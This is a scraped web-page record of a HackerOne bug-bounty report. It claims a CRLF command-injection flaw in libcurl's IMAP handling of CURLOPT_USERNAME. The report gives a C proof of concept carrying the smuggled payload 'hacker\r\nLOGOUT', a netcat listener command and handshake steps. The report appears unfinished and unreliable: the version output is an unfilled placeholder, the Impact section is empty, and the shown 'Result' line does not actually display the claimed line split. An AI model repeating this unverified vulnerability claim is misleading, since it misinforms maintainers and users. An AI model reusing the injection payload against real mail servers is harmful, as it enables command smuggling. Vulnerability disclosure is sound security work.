{“lastseen”:”2025-12-28T21:30:18″,”description”:”## Summary:\\nI have discovered a CRLF injection vulnerability in the IMAP protocol implementation of libcurl. The vulnerability exists because the `imap_atom` function in `lib\/imap.c` fails to properly sanitize or quote Carriage Return (`\\\\r`) and Line Feed (`\\\\n`) characters when processing the `CURLOPT_USERNAME` option.\\n\\nThis allows an attacker to inject arbitrary IMAP commands by inserting `\\\\r\\\\n` sequences into the username field. When these characters are sent to the server, they terminate the current command and allow the subsequent data to be interpreted as a new, separate command (Protocol Smuggling).\\n\\n## Affected version\\nI successfully reproduced this on the latest master branch of curl.\\n\\nOutput of `curl -V`:\\n[PASTE YOUR curl -V OUTPUT HERE]\\n\\n## Steps To Reproduce:\\nTo reproduce this issue, we need to bypass the CLI argument parsing and use `libcurl` directly via a C program. We also need a manual netcat listener to observe the raw protocol data.\\n\\n1. **Setup a Fake IMAP Server:**\\n Open a terminal and listen on port 143 (or any available port) using netcat:\\n `sudo nc -lvp 143`\\n\\n2. **Compile the Proof of Concept (PoC):**\\n Save the following code as `poc_imap.c` and compile it against libcurl (e.g., `gcc poc_imap.c -o poc_imap -lcurl`):\\n\\n “`c\\n #include \\u003cstdio.h\\u003e\\n #include \\u003ccurl\/curl.h\\u003e\\n\\n int main(void)\\n {\\n CURL *curl;\\n CURLcode res;\\n\\n curl_global_init(CURL_GLOBAL_DEFAULT);\\n curl = curl_easy_init();\\n if(curl) {\\n \/\/ Target localhost on port 143\\n curl_easy_setopt(curl, CURLOPT_URL, \\”imap:\/\/127.0.0.1:143\/\\”);\\n\\n \/\/ PAYLOAD INJECTION:\\n \/\/ We inject \\”LOGOUT\\” as a separate command using CRLF.\\n \/\/ If vulnerable, this will be sent as a raw new line, not quoted.\\n const char *payload = \\”hacker\\\\r\\\\nLOGOUT\\”;\\n\\n curl_easy_setopt(curl, CURLOPT_USERNAME, payload);\\n curl_easy_setopt(curl, CURLOPT_PASSWORD, \\”password123\\”);\\n\\n \/\/ Set a timeout to avoid hanging indefinitely during manual test\\n curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);\\n\\n \/\/ Perform the request\\n res = curl_easy_perform(curl);\\n \\n curl_easy_cleanup(curl);\\n }\\n curl_global_cleanup();\\n return 0;\\n }\\n “`\\n\\n3. **Run the PoC:**\\n Execute the compiled binary: `.\/poc_imap`\\n\\n4. **Trigger the Injection (Manual Handshake):**\\n In the terminal running `netcat` (Step 1), you will see a connection. You must manually simulate the IMAP server greeting for libcurl to proceed sending data.\\n \\n * Type: `* OK IMAP server ready` and press **ENTER**.\\n * Wait for curl to send `A001 CAPABILITY`.\\n * Type: `A001 OK Capability completed` and press **ENTER**.\\n\\n5. **Observe the Injection:**\\n Immediately after the handshake, observe the output in the netcat terminal.\\n\\n**Result:**\\nThe server receives:\\nA002 LOGIN hacker LOGOUT password123\\n\\n**Expected Behavior:**\\nThe username should be quoted (e.g., `\\”hacker\\\\r\\\\nLOGOUT\\”`) or the client should reject the CRLF characters before sending.\\n\\n## Supporting Material\/References:\\n* **Vulnerable Component:** `lib\/imap.c`, specifically the `imap_atom` function handling.\\n* **Impact:** This allows Protocol Smuggling, enabling an attacker to execute arbitrary IMAP commands (like `DELETE`, `SELECT`, `CREATE`) within the authenticated session context.\\n\\n## Impact\\n\\n## Summary:”,”published”:”2025-12-27T16:35:37″,”modified”:”2025-12-28T21:28:41″,”type”:”hackerone”,”title”:”curl: CRLF Injection \/ Protocol Smuggling in libcurl via CURLOPT_USERNAME (IMAP)”,”source”:””,”references”:””,”id”:”H1:3479984″,”bulletinFamily”:”bugbounty”,”cwe”:null,”cvelist”:[],”sourceData”:””,”sourceHref”:””,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/hackerone.com\/reports\/3479984″,”category_name”:”News”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-28T21:30:18″,”description”:”## Summary:\\nI have discovered a CRLF injection vulnerability in the IMAP protocol implementation of libcurl. The vulnerability exists because the `imap_atom` function in `lib\/imap.c` fails…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,117,13,33,7,11,5],"class_list":["post-33049","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-hackerone","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n